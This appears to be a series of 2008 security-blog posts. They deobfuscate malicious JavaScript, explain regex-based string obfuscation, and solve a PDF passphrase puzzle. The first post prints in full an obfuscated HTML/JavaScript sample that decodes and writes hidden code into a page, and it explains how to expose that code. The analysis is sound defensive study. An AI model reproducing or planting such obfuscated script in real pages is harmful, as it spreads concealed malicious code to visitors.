May 2008


Most of the malicious javascripts out there are sometimes encrypted using commercial tools or, most of the time, using home made tricks. Is it really necessary? I mean: if you want to protect your page, do you really need an encryption tool?

I think the answer is no, it’s a useless waste of time (and sometimes money). Most of the time an automatic decoder is able to show the original code in few milliseconds, and when it fails you can use your brain… not so fast but it helps you to solve the puzzle for sure.
Even if you are able to fool one or more automatic decoder it doesn’t mean you have protected your script from unwanted eyes.

A simple proof is given by a piece of code I found at EvilCry’s blog. The code I’m referring to is:

<html><head><Meta Name=Encoder Content=HTMLSHIP>
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">
<noscript><iframe></iframe></noscript>
<script language="javascript">
<!--
jL0="0ucoc\\MIM",yU90="Iu\{\{\{\%\%ovf0N";0.1261199,nB73="0.7082915",yU90='\|\:T2B\ m\(8\?\$\*b\]AyX\"aOVt\.Y\-\_1qx\\\{\[l\niZI4\r3\=\!7uHv5JsCKPj\;QgR\+\`foM6w\/F\>\'rpN\<D9\^S\,\@\#dcWU\}\%LE\&nG0\~ekzh\)',jL0='\"u\>tc\`S\ \]I\_\&\{gholKDf\#LdkCXU\~\/z97y\'m\,\\8B\=\rRG\|\.iE\+n\n\%FJ\;1b\[saV\-36\)Aw\$O\(\!H2MNZ\*eqvPW4r\@T5\:Y\<Qx0\^pj\}\?';function lW4(uO49){"0u\%N\{\{I\{\\",l=uO49.length;'0k\+IBI\r0c',w='';while(l--)"0ucooc\;\{\{",o=jL0.indexOf(uO49.charAt(l)),'\~k\)0\~cc\+YX0c',w=(o==-1?uO49.charAt(l):yU90.charAt(o))+w;"0uoN0M\%\{\{",jL0=jL0.substring(1)+jL0.charAt(0),document.write(w);'0kZ\r\)Z\r\r\|'};lW4("2nW\(m\!L\`yD\<b\|Db\^\rJDiDnW\(m\!L\$\)l8t\r8\]\]U\;mV\ P\-W\|S\^\<LdDyy\?9V\|\<WLm\-\<\`XPS\ \?9\(\^L\|\(\<\`VDyn\^\@\;V\|\<WLm\-\<\`XSPS\ \?9P\-W\|S\^\<Ld\-\<W\-\<L\^\/LS\^\<\|\rXPS\;n\^L\>mS\^\-\|L\ KXSPS\ \?Ke\]xx\?\@\;XSPS\ \?\;\@P\-W\|S\^\<Ld\-\<W\-\<L\^\/LS\^\<\|\r\<\^\)\`w\|\<WLm\-\<\ K\(\^L\|\(\<\`VDyn\^K\?\;V\|\<WLm\-\<\`X\<PS\ \^\?9mV\ P\-W\|S\^\<LdyDo\^\(n\"\"\)m\<P\-\)dnmP\^\{D\(\?9mV\ \^d\)\}mW\}R\rU\?\(\^L\|\(\<\`VDyn\^\;\@\@\;mV\ P\-W\|S\^\<LdyDo\^\(n\?9P\-W\|S\^\<LdWD\!L\|\(\^\:i\^\<Ln\ \:i\^\<Ld3fr\*\:Mf4H\?\;P\-W\|S\^\<Ld\-\<S\-\|n\^P\-\)\<\rX\<PS\;\@\^yn\^9P\-W\|S\^\<Ld\-\<S\-\|n\^\|\!\rX\<PS\;\@\;S1Ux\rtEN\=\;\{fGE\r6EN8\;V\|\<WLm\-\<\`XP\)n\ \?9\)m\<P\-\)dnLDL\|n\`\r\`K\`K\;n\^L\>mS\^\-\|L\ KXP\)n\ \?KeUxx\?\;\@\;XP\)n\ \?\;mM\]N\r6xtU\;m48E\r\=8E8\;V\|\<WLm\-\<\`XPPn\ \?9mV\ P\-W\|S\^\<LdDyy\?9P\-W\|S\^\<Ld\-\<n\^y\^WLnLD\(L\rV\|\<WLm\-\<\`\ \?9\(\^L\|\(\<\`VDyn\^\@\;n\^L\>mS\^\-\|L\ KXPPn\ \?KeGxx\?\@\@\;XPPn\ \?\;b\+E\r8ENG\;mHUG\rNG\=G\;jltt\rtEN6\;yMGx\r\=G\=6\;p1tN\r8\]G\]\;jfN8\r\]\]\]x\;\~kx\rUG\=\]\;\;XymW\^\<n\^PXL\-X\rKF\^L\^\(\`\nDyyK\;2AnW\(m\!L\$")
//-->
</script>
<ScrIPt lANGUAGE=jAVASCRiPt>
lW4("MGN\#\%tCJYS\?d\ \'SJ\@\`\:8\%SDXwwr\r\%wwNtNSKit6\:S\~k0St\!fQ\n\,d\,3Qf\'wwY2DSD\?ddH\>wwAAAkA\rk3\!\[wtswz\?d\ \'\~wNtNwz\?d\ \'\~Xd\!fQ\n\,d\,3Qf\'kWdWDO\=m\=mMGXXS\%\!pfdpWS3QSoH\!Sc\+qSc00\|SI\>c0\>0cSJ6SXXO\=m\=mM\?d\ \'O\=mSSSM\?pfWO\=mSSSSSSMd\,d\'pO\=mSSSSSSSSS\=mSSSSSSMwd\,d\'pO\=mSSSSSSM\ pdfSQf\ pRDxY2Ysot\#sDS43QdpQdRDo\!f4\?Q3H\?\,\'\,fS\+k\rDwO\=mSSSSSSM\ pdfSQf\ pRD\$\#s6ottYsDS43QdpQdRDo\!f4\?Q3H\?\,\'\,fS\+k\rDwO\=mSSSMw\?pfWO\=m\=mSSSMg3WlSg\[43\'3\!RDP\-\-\-\-\-\-DSdpzdRDP000000DS\'\,QjRDP0000\-\-DSE\'\,QjRDPI000I0DSf\'\,QjRDP\-\-0000DO\=m\=mSM4pQdp\!OMgOJ\'pf\npS\!pH3\!dSfQlS\np\!E\,4pSE\,3\'fd\,3Q\nSd3\>SMoS\?\!p\-RD\ f\,\'d3\>fg\.\npv4Hf\n\?\,p\'Wk43\ DOfg\.\npv4Hf\n\?\,p\'Wk43\ MwgOMwfOMw4pQdp\!O\=m\=mSSSMwg3WlO\=mMw\?d\ \'O\=m")
</script>
</head><body><noscript><b>
<font color=red>This page requires a javascript enabled browser!!!</font></b></noscript>
</body></html>

Quite awfull indeed. I wanted to see the script code and, as always, I tried using some automatic decoders. The first script was easily decoded, but not the second one. I tried combining the scripts into only one without luck (it should work but I failed, don't know why...). The few decoders I tried were not able to give me a good result. I didn't try searching the net for some more decoders, but I decided to figure it out myself.

The second script starts with: lW4("MGN and ends with O\=m") characters sequence. It's like a generic call where lW4 represents the name of the function to call and the string inside " is the parameter, a very long string. To confirm this idea I need to find the function inside the first script. Here's the search result: lW4(uO49){
I'm on the right way, the line above is pretty similar to the first part of a function declaration. It's time to make the first script as readable as I can.

The script contains useless declarations (jL0 is declared two times, you can remove first one), useless variables (nB73 is not used) and useless strings (you can remove strings like "0u\%N\{\{I\{\\" or 0.1261199). It's pretty easy to remove them, the result I got is showed below:

yU90='\|\:T2B\ m\(8\?\$\*b\]AyX\"aOVt\.Y\-\_1qx\\\{\[l\niZI4\r3\=\!7uHv5JsCKPj\;QgR\+\`foM6w\/F\>\'rpN\<D9\^S\,\@\#dcWU\}\%LE\&nG0\~ekzh\)',
jL0='\"u\>tc\`S\ \]I\_\&\{gholKDf\#LdkCXU\~\/z97y\'m\,\\8B\=\rRG\|\.iE\+n\n\%FJ\;1b\[saV\-36\)Aw\$O\(\!H2MNZ\*eqvPW4r\@T5\:Y\<Qx0\^pj\}\?';

function lW4(uO49)
{
	l=uO49.length;
	w='';
	while(l--)
		o=jL0.indexOf(uO49.charAt(l)),
		w=(o==-1?uO49.charAt(l):yU90.charAt(o))+w;
	jL0=jL0.substring(1)+jL0.charAt(0),
	document.write(w);
};
lW4("2nW...");

Two strings, a function and a call to the function. Puzzle solved!
The scripts are used to decrypt two pieces of code, to see them I inserted an alert(w) instruction right after document.write(w). It’s the fastest wasy to see the code. If you read EvilCry’s post you should know the content of the first decrypted code, the other one is:

Just yesterday I had the opportunity to take a look at a sort of obfuscated Javascript code I have never seen before. The script contains a class named KyD defined using the prototype pattern. The code is something like this:

function KyD() {};

KyD.prototype = {
install : function()
{
...
},
cookieName:'feadcbhg',
getFrameURL : function()
{
...
},
...
};

var o44o=new KyD();
o44o.install();

More or less a standard class declaration. The constructor is empty, it doesn’t need special initial operation. Just after the class definition there are two more lines, a new KyD object is declared and the method “install” will be called.

For me it’s quite uncommon to see a class declaration inside a malicious script, I’m always used to see Javascript code using procedural paradigm. Anyway, this is not a problem of course. The problem arises looking at the declared methods. It’s often easy to understand a Javascript function from the source code, but not this time. Look at this snippet taken from one of the method declared inside KyD class:

Are you able to tell me the content of “o” in few seconds? Even if you know how to handle s you’ll need more than few seconds in order to solve the puzzle.
How to sort out the real meaning of the string? The script has been obfuscated using regular expressions; nothing impossible, but if you want to identify the content of the string s you need to know something about regexp.

How can regexp be used to obfuscate a string?
The string s is composed by 3 parts, two of them are obfuscated substrings while the other one is obtained by getFrameURL, another method of the class KyD.
The substrings have a replace method applied, in this specific case the method is used to search and replace characters from the string with regular expressions. The method is originally used to replace some characters with some other characters in a string:

stringObject.replace(findstring,newstring)

Here is how to use the method:

var s = "Say Hello";
document.write(str.replace(/Hello/, 'Ciao'));

The output will be “Say Ciao”, pretty easy. It’s also possible to use some more options, i.e.:
- i: used to perform a case insensitive search
- g: used to perform a global search over the entire string.

Back to our snippet. Looking at the first substring you’ll see that the replace method is used in this way:

replace(/[%\)@QI]/g, '')

g option is present and the new string is NULL, it means that part of the string will be cutted away. Which part of the string will be removed? The string to find is defined as a regular expression, everything inside square brackets (‘[' and ']‘) will be replaced with NULL. Removing the specified characters from the substring you’ll obtain the de-obfuscated substring:

Now I can decode all the strings obtaining the original script!
Quite a nice trick. It forces you to spend some more time over a script, nothing more. Thanks to Bobby for the script.

There was a challenge today at Didier Stevens’s blog . It’s a pdf puzzle, the goal is to find out the passphrase hidden inside the file.

Opening the file with a pdf reader you’ll see the text:
“The passphrase is XXXXXXXXXXXXXXXXXXX”.
Passphrase is not a sequence of ‘X’ for sure. How to find it out?

Didier gave us a little hint: “There’s a very simple solution just requiring Notepad”. Opening the file with notepad reveals the complete structure of the pdf file. The phrase is not inside the file; after a better glimpse at the file I notice these lines:
5 0 obj
...
/Filter /ASCII85Decode
...
stream
6<#'\7PQ#@1a#b...

This is the definition of an object, as you can see it’s encoded using ascii85. Using a decoder it’s pretty easy to retrieve the required passphrase: “Incremental Updates”.

Is it really necessary to use an ascii85 decoder?
There are two suspicious snippets inside the file indeed; the first snippet is the one you see above, and the other one is:
5 0 obj
...
/Filter /ASCII85Decode
...
stream
6<#'\7PQ#@1a#b...

They are two almost equal objects. There are only some different bytes in the encoded strings. The first and the last part of the encoded strings are the same, it means they have the same operators. i.e. if the object is used to display a text string they can have the same coordinates.

Ok, I have two streams but only one will be showed. Who decide what to display or not?
A pdf file contains a Cross Reference table which is used to define all the objects that are inside the file. A table is something like:

xref
0 7
0000000000 65535 f
0000000012 00000 n
0000000089 00000 n
0000000145 00000 n
0000000214 00000 n
0000000419 00000 n
0000000594 00000 n

There are 7 object defined. Checking each object offset (the number in the first column) you’ll find out that only one stream is defined. The other one is not defined in this table because there’s another Cross Reference table at the end of the file:

xref
0 1
0000000000 65535 f
5 1
0000000935 00000 n

It’s pretty obvious now, the second stream (text with xxx) will be written over the first one (text with password).
To see the right text I removed some bytes from the end of the file. You can remove all the bytes after the first “%%EOF” occurrence.
Now you can see the hidden passphrase without using an ascii85 decoder. Nice challenge!

Lunch break ends now…